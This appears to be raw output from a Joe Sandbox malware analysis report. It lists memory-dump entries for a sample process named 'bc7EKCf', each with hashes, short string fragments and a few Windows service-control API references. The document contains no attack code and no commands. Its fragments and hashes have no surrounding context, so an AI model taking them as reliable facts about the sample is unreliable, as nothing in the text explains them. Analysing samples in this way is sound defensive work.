                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: c^q$c^q$c^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1173078842
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b019953c061d2bbec7efbb36dfebe0b04c6380e65006b5599a20947c1728667
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b77138c5b2d61bde2c985cf963a0c42a375a32b2e4fe8e77deb4ce327703d34d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b019953c061d2bbec7efbb36dfebe0b04c6380e65006b5599a20947c1728667
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D9159B5B14525CFCB18CF28C488929B7B5BF89B08B1549A8E90ADB371DB71EC41CB80
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$,bq$,bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4208516594
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4927a1d7fe4084ab5b62a4137bdcdb7902a9e6819f3fae4f147fc1bd8197ff9a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b6bff47fdafcc96518daaa69c3e8535433217692dc17f16f0c5425a84bd4206e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4927a1d7fe4084ab5b62a4137bdcdb7902a9e6819f3fae4f147fc1bd8197ff9a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4371C4706093A18FC706EF38D8949AA7FB6AF8621471540EAD445CF2A7DB34DC09C7A6
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: 4c^q$$^q$c^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3540629215
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f5dce7d97412538f521e5c912417a76677900d9f71df8f977c5dad28b10236f5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: fc16f52f623cce54d3f02104b85c25fc63be84347c15fbaa411194a971457864
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f5dce7d97412538f521e5c912417a76677900d9f71df8f977c5dad28b10236f5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5381F230A40308DFDB059FA4D5449EEBFB2FF89710F50456AE502AF3A4DB369946CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$(bq$\
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3861934522
                                                                                                                                                                                                                                                                                                                    • Opcode ID: e3255a32c21d69541130c45ecbd994c3cdf219934bf9ba8ae7e7afc4fbb73a4d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 91f8292c958f60af090dfce164e2e59203f185ed5b44c629d0d2a1241fca5854
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3255a32c21d69541130c45ecbd994c3cdf219934bf9ba8ae7e7afc4fbb73a4d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C54111317042269FDB195A39582433E36E6EFC4766F1400AEE507CB3C5DEB9CD0287A5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,0159A762), ref: 0159A861
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1975550297.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_1590000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 1889721586-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a1c22f0193236cc4fbee8b809924639c2d6a6efeb6268b316ba43f74368b1be3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 28c4bc329ac5e1df5455d72352d53b113b9957ac38cb319a7422bef386166771
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1c22f0193236cc4fbee8b809924639c2d6a6efeb6268b316ba43f74368b1be3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE418E75A003099FDB14DFAAD8446AEBBF6FBC5314F54842ED905AB340DB749806CBA1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,00000000,?,?,?,?,?,?), ref: 076E5507
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2004922842.00000000076E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076E0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_76e0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 3793708945-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3ecdb562f1c55b92e97e6e5a13af635c3832470e826def8bb261ca433e2aad41
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ea3da270fdc962625123c41788d5ed18f395c1dc87531fbace6e22b65541988f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ecdb562f1c55b92e97e6e5a13af635c3832470e826def8bb261ca433e2aad41
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 702116B5901208EFDB10CFAAD984ADEBFF8FB48314F10841AE955A3311D374A954CFA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,0159A762), ref: 0159A861
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1975550297.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_1590000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 1889721586-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 63d5e68d26148048050b65e541f87a1613f360566dcd8760b665dbbb63768648
                                                                                                                                                                                                                                                                                                                    • Instruction ID: e931d6abe10ab44aedc5e424441323b57131fda528faa44d6fec0368f31cc420
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63d5e68d26148048050b65e541f87a1613f360566dcd8760b665dbbb63768648
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D2133B6D003098FDB14CF9AC884ADEFBF4FB88310F14852ED919AB210C775A945CBA1
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(?), ref: 0159AAE5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1975550297.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_1590000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleService
                                                                                                                                                                                                                                                                                                                    • String ID: 162/
                                                                                                                                                                                                                                                                                                                    • API String ID: 1725840886-261402834
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 33f887c9c4fc368892e58536f1f8111e7042744541de44603fea84603c65c808
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c14505676e2d4a36a1d032aac8b8a41de7ee72f479f4fda2f8829c037dae2353
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33f887c9c4fc368892e58536f1f8111e7042744541de44603fea84603c65c808
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F1136B1800749CFDB10DF99C549BDEBBF4EB48320F108459D558A7341D378A944CFA5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq$;^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-869145774
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4b95a3e68e42d90510d3fbabcf2a80d00a05bc3240ab12b7201a0915e156d93
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ad1f8f67ecce3f39a87c41185d711b95f94cf1bf15e0a6262c0a282e35640931
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4b95a3e68e42d90510d3fbabcf2a80d00a05bc3240ab12b7201a0915e156d93
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E326C30A00705CFCB25CF29C844B6ABBF2FF8571271585AAD416CB6A5EB34F886CB51
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012982944.0000000008B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 08B30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8b30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$Te^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2856382362
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 34fe3e703c5bb881c76dd9fd29b1cbf1a8639b7b48687f0cbdd4256e5fd31b1a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9df5ebc0af129397c551ad556e6ba4d38affa644700abde45f800b8ea325143f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34fe3e703c5bb881c76dd9fd29b1cbf1a8639b7b48687f0cbdd4256e5fd31b1a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73229D75B006259FDB28DF68C85866EBBE3FF88312B1485ACD5069B798DF34E801DB41
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$d
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3334038649
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0da39522feba9d02d7df84ee4fd85fc0cef73ded310b03673ae43b21d4b7dc9a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f43108691c56ff6d59ed0b2a09afaa59f769b25d85aaa8c43c64ce3f6fbf95d4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0da39522feba9d02d7df84ee4fd85fc0cef73ded310b03673ae43b21d4b7dc9a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F029E74A006168FCB10CF29C48096ABBF6FF88318B15C669D86ADB765DB31FD45CB90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$(bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-4224401849
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 3b6959791bd68ecdcd5ef75501149417515e138d9ea445ed903435ae1743dea8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ca184318bcfe56691bae64d7a4e44f918e68a2fee79b7a311084d66ac883bedd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b6959791bd68ecdcd5ef75501149417515e138d9ea445ed903435ae1743dea8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FE169B4B401058FCB48EFA8D49896EB7F6FF89314B1185A9E506EB361DB34EC01CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$d
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3334038649
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8f7167fdbd30f0732f2ef0ea2f788312c5aa8ee5c8915f4bedcb377f7cc3d36b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6694efada7d750d82ad4ea8a1d521f18dc9492045c8f5683d369dae47c61794a
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f7167fdbd30f0732f2ef0ea2f788312c5aa8ee5c8915f4bedcb377f7cc3d36b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDC1CFB0B402298FC714DF7DC49466EBBF6FF89704B248869E8469B354DA70EC45CB81
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $(bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-511904997
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 117468e0218e6c6105ff543dfe53aa14136201e566aa7e36fd2f457e5cc6c959
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b72cf235b99a66b582d7ab042bab41b65b9aca1ea0f399695f0ba0548efa6df1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 117468e0218e6c6105ff543dfe53aa14136201e566aa7e36fd2f457e5cc6c959
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34813370A05359CFCB15CF68E4502AEBBB2FF81308F10857AE4429B791CB799C45CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007214185.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7950000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq$4'^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-1386295989
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fcafd44c73431a1d4109ae7ad4ab5cbce15eeb1cae9c3ce6637a18be7ea91b06
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f9061a2dbfc8f55b87fb797fd41478d15f5426cffdccc5d5e942555422b64a73
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcafd44c73431a1d4109ae7ad4ab5cbce15eeb1cae9c3ce6637a18be7ea91b06
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B861DDB57002159FCB08DF6DC49492EBBEAEFC8260711806AE90ACF3A5CE35ED41C790
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2008528659.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (bq$4'^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3799531831
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 584aaed1baf5302e2ebc1820b2da2aedd948460643a4a172f638a1bc0b75fcd5
                                                                                                                                                                                                                                                                                                                    • Instruction ID: f8df634ad3c7070863f043566ca0e83a7820f1ddad061ebfbc769c5c8b4ba33d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 584aaed1baf5302e2ebc1820b2da2aedd948460643a4a172f638a1bc0b75fcd5
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC518A7170024A8FCB04EFADC894AAFBBA6FF98344B208569D4099B355DF30DD46C791
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (o^q$(bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-797522611
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8277dde648e49af424e1fa134a901eb3f1e398ae3a9dcfdf51145c92b6ff6601
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 998d40e576f884393f59a653b1a20fd5d6aa7c8db1fbe2702db86bbbf639874b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8277dde648e49af424e1fa134a901eb3f1e398ae3a9dcfdf51145c92b6ff6601
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7318C34B002148FCB55DF68D45896EBBF6FF89221B1444AEE91ADB362EB308C05CB91
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: (o^q$(bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-797522611
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d047b743d927bca7e162200b4df06dceffbfd1757e477ee943df7e946b602a3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9d5fa891f05030b964a592a861954c4c071b2bd8cadb97bf6e50023c9261fabd
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d047b743d927bca7e162200b4df06dceffbfd1757e477ee943df7e946b602a3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63217C78B002248FCB44DF69D44896EBBF6FF8C621B1444A9E91AD7361EF30DC008B90
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2658103896
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f9652bff24994c03dba1784ad3d1f8bc51139a7ead07ece688285656a6979208
                                                                                                                                                                                                                                                                                                                    • Instruction ID: bdb44211e0e88fc30b5134e5ea71cdfaf51a9c35162cb2e831f17f6c6abb68f0
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9652bff24994c03dba1784ad3d1f8bc51139a7ead07ece688285656a6979208
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0A761318A805FE364522D9C1DB3779EECBC9616F18853EB54BC3B82FD689C0683A5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2007326542.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7960000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b943cc0200db5b969e2e2b508585f1226503c9e5bd266f3feaf23cdee196680
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 703b0fc772514a9e654ffc9fd931b18c06077e0a6046c30441401feb14cb57ca
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b943cc0200db5b969e2e2b508585f1226503c9e5bd266f3feaf23cdee196680
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91F03971750108DFCB18CE08D4C9D997B71BB85358F208665F9054F328C770D988CBD0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2012486298.0000000008AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_8ad0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: ,bq$,bq
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-2699258169
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 06d3e256ed3ac86653840af00a01752d3ec2bd60f3b0127854e0b1ac883030e2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9b57f7c0dd98ea7bc4e7cc4446b9acd95aa3e44f81223e7782e082394b55f334
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06d3e256ed3ac86653840af00a01752d3ec2bd60f3b0127854e0b1ac883030e2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE06D34200359CBC7048F54C8046DB7376FB56202B208468E81287A95C731EC12CBD0
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2002641772.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_6fc0000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $^q$$^q
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-355816377
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0963b179db6f54b3878f80ce6ca205880cdb89d3f845b4c292e91d299986318a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: b0121e9bd00e2a04208894e86287167e28b35747aca534f96e675ca3eb82985e
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0963b179db6f54b3878f80ce6ca205880cdb89d3f845b4c292e91d299986318a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51D02B20B4524B4FEB7C5F205A0C34437617F01610F3054BEC0094F187C93A8069C721
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2008528659.0000000007E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7e30000_bc7EKCf.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: d
